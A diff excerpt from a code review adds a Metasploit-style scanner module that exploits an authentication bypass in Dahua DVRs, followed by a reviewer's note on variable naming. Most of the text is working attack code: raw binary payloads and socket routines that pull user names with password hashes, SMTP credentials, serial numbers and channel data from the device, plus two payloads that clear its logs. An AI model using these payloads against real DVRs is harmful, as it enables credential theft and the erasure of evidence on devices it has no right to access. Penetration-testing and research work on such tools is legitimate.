modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,395 @@
+        "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to grab the Channels that each camera is assigned to on the  DVR
+  CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
+             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
+             "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
+             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to grab the Users Groups of the DVR
+  GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \
+           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to grab the Users  and their hashes from the DVR
+  USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to grab the Serial Number of the DVR
+  SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \
+       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to clear the logs of the DVR
+  CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \
+               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+  def setup
+    @password = datastore['PASSWORD']
+    @password ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def grab_version
+    connect
+    sock.put(VERSION)
+    data = sock.get_once
+    return unless data =~ /[\x00]{8,}([[:print:]]+)/
+    ver = Regexp.last_match[1]
+    print_good("#{peer} -- version: #{ver}")
+  end
+
+  def grab_serial
+    connect
+    sock.put(SN)
+    data = sock.get_once
+    return unless data =~ /[\x00]{8,}([[:print:]]+)/
+    serial = Regexp.last_match[1]
+    print_good("#{peer} -- serial number: #{serial}")
+  end
+
+  def grab_email
+    connect
+    sock.put(EMAIL)
+    return unless (response = sock.get_once)
+    data = response.split('&&')
+    print_good("#{peer} -- Email Settings:")
+    return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
+    if mailhost = Regexp.last_match[1].split(':')
+      print_status("  Server: #{mailhost[0]}") unless mailhost[0].blank?
+      print_status("  Server Port: #{mailhost[1]}") unless mailhost[1].blank?
+      print_status("  Destination Email: #{data[1]}") unless data[1].blank?
+      mailserver = "#{mailhost[0]}"
+      mailport = "#{mailhost[1]}"
+    end
+    return unless data[5].blank? && data[6].blank?
+    print_good("  SMTP User: #{data[5]}")
+    print_good("  SMTP Password: #{data[6]}")
+    muser = "#{data[5]}"
+    mpass = "#{data[6]}"
```

Comment:
Do this assignment earlier and use `muser` and `mpass` rather than `data[5]` and `data[6]`